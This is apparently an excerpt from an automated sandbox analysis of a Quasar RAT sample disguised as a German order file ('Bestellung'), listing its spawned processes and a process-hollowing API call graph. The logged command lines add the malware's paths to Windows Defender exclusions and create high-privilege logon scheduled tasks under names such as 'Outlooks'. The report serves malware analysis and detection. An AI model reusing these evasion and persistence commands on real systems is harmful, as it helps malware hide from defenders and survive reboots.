                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:5
                                                                          Start time:08:53:36
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                                                                          Imagebase:0xb90000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:6
                                                                          Start time:08:53:36
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:7
                                                                          Start time:08:53:36
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp"
                                                                          Imagebase:0xf30000
                                                                          File size:187'904 bytes
                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:8
                                                                          Start time:08:53:36
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:9
                                                                          Start time:08:53:37
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"
                                                                          Imagebase:0xb50000
                                                                          File size:3'842'568 bytes
                                                                          MD5 hash:15F259B30EC72A5217144834F7F5B564
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000009.00000002.1477097522.0000000000720000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:10
                                                                          Start time:08:53:39
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe
                                                                          Imagebase:0x40000
                                                                          File size:3'842'568 bytes
                                                                          MD5 hash:15F259B30EC72A5217144834F7F5B564
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000002.1683887266.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 47%, ReversingLabs
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:11
                                                                          Start time:08:53:40
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /f
                                                                          Imagebase:0xf30000
                                                                          File size:187'904 bytes
                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:12
                                                                          Start time:08:53:40
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:13
                                                                          Start time:08:53:40
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                                                                          Imagebase:0xc90000
                                                                          File size:3'842'568 bytes
                                                                          MD5 hash:15F259B30EC72A5217144834F7F5B564
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000D.00000002.1555939194.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 47%, ReversingLabs
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:15
                                                                          Start time:08:53:41
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                                                                          Imagebase:0xc40000
                                                                          File size:3'842'568 bytes
                                                                          MD5 hash:15F259B30EC72A5217144834F7F5B564
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000F.00000002.1685100686.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:16
                                                                          Start time:08:53:43
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                                                                          Imagebase:0xb90000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:17
                                                                          Start time:08:53:44
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:18
                                                                          Start time:08:53:44
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                                                                          Imagebase:0xb90000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:19
                                                                          Start time:08:53:44
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpD780.tmp"
                                                                          Imagebase:0xf30000
                                                                          File size:187'904 bytes
                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:20
                                                                          Start time:08:53:44
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:21
                                                                          Start time:08:53:44
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:22
                                                                          Start time:08:53:45
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                                                                          Imagebase:0xcc0000
                                                                          File size:3'842'568 bytes
                                                                          MD5 hash:15F259B30EC72A5217144834F7F5B564
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000016.00000002.3874269347.0000000003642000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:23
                                                                          Start time:08:53:48
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /f
                                                                          Imagebase:0xf30000
                                                                          File size:187'904 bytes
                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:24
                                                                          Start time:08:53:48
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:26
                                                                          Start time:08:53:55
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp314.tmp"
                                                                          Imagebase:0xf30000
                                                                          File size:187'904 bytes
                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:27
                                                                          Start time:08:53:55
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:28
                                                                          Start time:08:53:55
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                                                                          Imagebase:0xb90000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:29
                                                                          Start time:08:53:56
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:30
                                                                          Start time:08:53:56
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                                                                          Imagebase:0xb90000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:31
                                                                          Start time:08:53:56
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:32
                                                                          Start time:08:53:56
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp537.tmp"
                                                                          Imagebase:0xf30000
                                                                          File size:187'904 bytes
                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:33
                                                                          Start time:08:53:56
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:34
                                                                          Start time:08:53:56
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                                                                          Imagebase:0x7d0000
                                                                          File size:3'842'568 bytes
                                                                          MD5 hash:15F259B30EC72A5217144834F7F5B564
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:35
                                                                          Start time:08:53:57
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                                                                          Imagebase:0xb40000
                                                                          File size:3'842'568 bytes
                                                                          MD5 hash:15F259B30EC72A5217144834F7F5B564
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:13.5%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:1.8%
                                                                            Total number of Nodes:278
                                                                            Total number of Limit Nodes:12
                                                                            execution_graph 35816 980f0b0 35817 980f23b 35816->35817 35819 980f0d6 35816->35819 35819->35817 35820 980adf4 35819->35820 35821 980f330 PostMessageW 35820->35821 35822 980f39c 35821->35822 35822->35819 35509 980b891 35510 980b89b 35509->35510 35511 980b95c 35509->35511 35515 980dee0 35510->35515 35531 980df56 35510->35531 35548 980def0 35510->35548 35516 980def0 35515->35516 35519 980df12 35516->35519 35564 980e3ee 35516->35564 35569 980e6e2 35516->35569 35574 980e220 35516->35574 35579 980e5bf 35516->35579 35583 980e43c 35516->35583 35590 980e4dc 35516->35590 35596 980e85b 35516->35596 35601 980e618 35516->35601 35605 980e758 35516->35605 35610 980e556 35516->35610 35615 980e413 35516->35615 35623 980ee71 35516->35623 35628 980e4af 35516->35628 35519->35511 35532 980dee4 35531->35532 35533 980df59 35531->35533 35534 980e220 2 API calls 35532->35534 35535 980e6e2 2 API calls 35532->35535 35536 980e3ee 2 API calls 35532->35536 35537 980e4af 2 API calls 35532->35537 35538 980ee71 2 API calls 35532->35538 35539 980e413 4 API calls 35532->35539 35540 980e556 2 API calls 35532->35540 35541 980e758 2 API calls 35532->35541 35542 980e618 2 API calls 35532->35542 35543 980e85b 2 API calls 35532->35543 35544 980e4dc 2 API calls 35532->35544 35545 980e43c 4 API calls 35532->35545 35546 980df12 35532->35546 35547 980e5bf 2 API calls 35532->35547 35533->35511 35534->35546 35535->35546 35536->35546 35537->35546 35538->35546 35539->35546 35540->35546 35541->35546 35542->35546 35543->35546 35544->35546 35545->35546 35546->35511 35547->35546 35549 980df0a 35548->35549 35550 980e220 2 API calls 35549->35550 35551 980e6e2 2 API calls 35549->35551 35552 980e3ee 2 API calls 35549->35552 35553 980e4af 2 API calls 35549->35553 35554 980ee71 2 API calls 35549->35554 35555 980e413 4 API calls 35549->35555 35556 980e556 2 API calls 35549->35556 35557 980e758 2 API calls 35549->35557 35558 980e618 2 API calls 35549->35558 35559 980e85b 2 API calls 35549->35559 35560 980e4dc 2 API calls 35549->35560 35561 980e43c 4 API calls 35549->35561 35562 980df12 35549->35562 35563 980e5bf 2 API calls 35549->35563 35550->35562 35551->35562 35552->35562 35553->35562 35554->35562 35555->35562 35556->35562 35557->35562 35558->35562 35559->35562 35560->35562 35561->35562 35562->35511 35563->35562 35565 980e40d 35564->35565 35633 980ab88 35565->35633 35637 980ab80 35565->35637 35566 980e582 35570 980e6e8 35569->35570 35641 980b1d1 35570->35641 35645 980b1d8 35570->35645 35571 980eab7 35575 980e253 35574->35575 35649 980b460 35575->35649 35653 980b454 35575->35653 35581 980b1d1 WriteProcessMemory 35579->35581 35582 980b1d8 WriteProcessMemory 35579->35582 35580 980e506 35580->35519 35581->35580 35582->35580 35657 980f040 35583->35657 35662 980f02f 35583->35662 35584 980e400 35588 980ab80 ResumeThread 35584->35588 35589 980ab88 ResumeThread 35584->35589 35585 980e582 35585->35585 35588->35585 35589->35585 35591 980e4e9 35590->35591 35593 980ebfb 35591->35593 35594 980ab80 ResumeThread 35591->35594 35595 980ab88 ResumeThread 35591->35595 35592 980e582 35593->35519 35594->35592 35595->35592 35597 980e864 35596->35597 35599 980b1d1 WriteProcessMemory 35597->35599 35600 980b1d8 WriteProcessMemory 35597->35600 35598 980ea60 35599->35598 35600->35598 35675 980b2c1 35601->35675 35679 980b2c8 35601->35679 35602 980e3d5 35602->35519 35606 980eaf8 35605->35606 35608 980ac30 Wow64SetThreadContext 35606->35608 35609 980ac38 Wow64SetThreadContext 35606->35609 35607 980e3d5 35607->35519 35608->35607 35609->35607 35611 980e55c 35610->35611 35613 980ab80 ResumeThread 35611->35613 35614 980ab88 ResumeThread 35611->35614 35612 980e582 35613->35612 35614->35612 35616 980e425 35615->35616 35683 980b100 35616->35683 35687 980b118 35616->35687 35617 980e66c 35621 980b1d1 WriteProcessMemory 35617->35621 35622 980b1d8 WriteProcessMemory 35617->35622 35618 980eab7 35621->35618 35622->35618 35624 980e2d5 35623->35624 35624->35623 35626 980b460 CreateProcessA 35624->35626 35627 980b454 CreateProcessA 35624->35627 35625 980e3aa 35626->35625 35627->35625 35629 980e4d5 35628->35629 35631 980ab80 ResumeThread 35629->35631 35632 980ab88 ResumeThread 35629->35632 35630 980e582 35631->35630 35632->35630 35634 980abc8 ResumeThread 35633->35634 35636 980abf9 35634->35636 35636->35566 35638 980abc8 ResumeThread 35637->35638 35640 980abf9 35638->35640 35640->35566 35642 980b220 WriteProcessMemory 35641->35642 35644 980b277 35642->35644 35644->35571 35646 980b220 WriteProcessMemory 35645->35646 35648 980b277 35646->35648 35648->35571 35650 980b4e9 CreateProcessA 35649->35650 35652 980b6ab 35650->35652 35654 980b4e9 CreateProcessA 35653->35654 35656 980b6ab 35654->35656 35658 980f055 35657->35658 35667 980ac30 35658->35667 35671 980ac38 35658->35671 35659 980f06b 35659->35584 35663 980f040 35662->35663 35665 980ac30 Wow64SetThreadContext 35663->35665 35666 980ac38 Wow64SetThreadContext 35663->35666 35664 980f06b 35664->35584 35665->35664 35666->35664 35668 980ac7d Wow64SetThreadContext 35667->35668 35670 980acc5 35668->35670 35670->35659 35672 980ac7d Wow64SetThreadContext 35671->35672 35674 980acc5 35672->35674 35674->35659 35676 980b313 ReadProcessMemory 35675->35676 35678 980b357 35676->35678 35678->35602 35680 980b313 ReadProcessMemory 35679->35680 35682 980b357 35680->35682 35682->35602 35684 980b158 VirtualAllocEx 35683->35684 35686 980b195 35684->35686 35686->35617 35688 980b158 VirtualAllocEx 35687->35688 35690 980b195 35688->35690 35690->35617 35691 fc77a8 35692 fc77b2 35691->35692 35696 fc7ca0 35691->35696 35701 fc7374 35692->35701 35694 fc77cd 35697 fc7cc5 35696->35697 35705 fc7d9f 35697->35705 35709 fc7db0 35697->35709 35702 fc737f 35701->35702 35704 fca4e2 35702->35704 35717 fc952c 35702->35717 35704->35694 35707 fc7db0 35705->35707 35706 fc7eb4 35706->35706 35707->35706 35713 fc79dc 35707->35713 35710 fc7dd7 35709->35710 35711 fc79dc CreateActCtxA 35710->35711 35712 fc7eb4 35710->35712 35711->35712 35714 fc8e40 CreateActCtxA 35713->35714 35716 fc8f03 35714->35716 35718 fc9537 35717->35718 35721 fc95ac 35718->35721 35720 fca81d 35720->35704 35722 fc95b7 35721->35722 35725 fc95dc 35722->35725 35724 fca8fa 35724->35720 35726 fc95e7 35725->35726 35729 fc95fc 35726->35729 35728 fca9ed 35728->35724 35731 fc9607 35729->35731 35730 fcbe39 35730->35728 35731->35730 35734 5040628 35731->35734 35739 5040638 35731->35739 35735 5040635 35734->35735 35736 504067d 35735->35736 35738 5040970 10 API calls 35735->35738 35744 5040960 35735->35744 35736->35730 35738->35736 35740 5040659 35739->35740 35741 504067d 35740->35741 35742 5040960 10 API calls 35740->35742 35743 5040970 10 API calls 35740->35743 35741->35730 35742->35741 35743->35741 35745 5040980 35744->35745 35746 504099d 35745->35746 35747 5040a10 6 API calls 35745->35747 35748 5040a20 6 API calls 35745->35748 35746->35736 35747->35746 35748->35746 35749 fcebd8 35750 fcec1a 35749->35750 35751 fcec20 GetModuleHandleW 35749->35751 35750->35751 35752 fcec4d 35751->35752 35823 50451f0 35824 5045258 CreateWindowExW 35823->35824 35826 5045314 35824->35826 35826->35826 35753 f7d01c 35754 f7d034 35753->35754 35755 f7d08e 35754->35755 35760 5042d34 35754->35760 35769 50453a8 35754->35769 35773 5046108 35754->35773 35782 5045397 35754->35782 35761 5042d3f 35760->35761 35762 5046179 35761->35762 35764 5046169 35761->35764 35765 5046177 35762->35765 35802 5042e5c 35762->35802 35786 5046290 35764->35786 35791 504636c 35764->35791 35797 50462a0 35764->35797 35765->35765 35770 50453ce 35769->35770 35771 5042d34 CallWindowProcW 35770->35771 35772 50453ef 35771->35772 35772->35755 35776 5046118 35773->35776 35774 5046179 35775 5042e5c CallWindowProcW 35774->35775 35778 5046177 35774->35778 35775->35778 35776->35774 35777 5046169 35776->35777 35779 5046290 CallWindowProcW 35777->35779 35780 50462a0 CallWindowProcW 35777->35780 35781 504636c CallWindowProcW 35777->35781 35778->35778 35779->35778 35780->35778 35781->35778 35783 50453ce 35782->35783 35784 5042d34 CallWindowProcW 35783->35784 35785 50453ef 35784->35785 35785->35755 35788 50462b4 35786->35788 35787 5046340 35787->35765 35806 5046348 35788->35806 35810 5046358 35788->35810 35792 504637a 35791->35792 35793 504632a 35791->35793 35795 5046348 CallWindowProcW 35793->35795 35796 5046358 CallWindowProcW 35793->35796 35794 5046340 35794->35765 35795->35794 35796->35794 35798 50462b4 35797->35798 35800 5046348 CallWindowProcW 35798->35800 35801 5046358 CallWindowProcW 35798->35801 35799 5046340 35799->35765 35800->35799 35801->35799 35803 5042e67 35802->35803 35804 504785a CallWindowProcW 35803->35804 35805 5047809 35803->35805 35804->35805 35805->35765 35807 5046358 35806->35807 35808 5046369 35807->35808 35813 50477a0 35807->35813 35808->35787 35811 5046369 35810->35811 35812 50477a0 CallWindowProcW 35810->35812 35811->35787 35812->35811 35814 5042e5c CallWindowProcW 35813->35814 35815 50477aa 35814->35815 35815->35808 35470 5045988 35471 504599c 35470->35471 35473 50459b8 35471->35473 35474 5040970 35471->35474 35475 5040980 35474->35475 35476 504099d 35475->35476 35479 5040a10 35475->35479 35490 5040a20 35475->35490 35476->35473 35480 5040a66 GetCurrentProcess 35479->35480 35482 5040ab8 GetCurrentThread 35480->35482 35485 5040ab1 35480->35485 35483 5040af5 GetCurrentProcess 35482->35483 35486 5040aee 35482->35486 35484 5040b2b 35483->35484 35501 5040bf2 35484->35501 35485->35482 35486->35483 35488 5040b84 35488->35476 35491 5040a66 GetCurrentProcess 35490->35491 35493 5040ab1 35491->35493 35494 5040ab8 GetCurrentThread 35491->35494 35493->35494 35495 5040af5 GetCurrentProcess 35494->35495 35496 5040aee 35494->35496 35497 5040b2b 35495->35497 35496->35495 35500 5040bf2 2 API calls 35497->35500 35498 5040b53 GetCurrentThreadId 35499 5040b84 35498->35499 35499->35476 35500->35498 35505 5041068 DuplicateHandle 35501->35505 35507 5041070 DuplicateHandle 35501->35507 35502 5040b53 GetCurrentThreadId 35502->35488 35506 5041106 35505->35506 35506->35502 35508 5041106 35507->35508 35508->35502

                                                                            Executed Functions

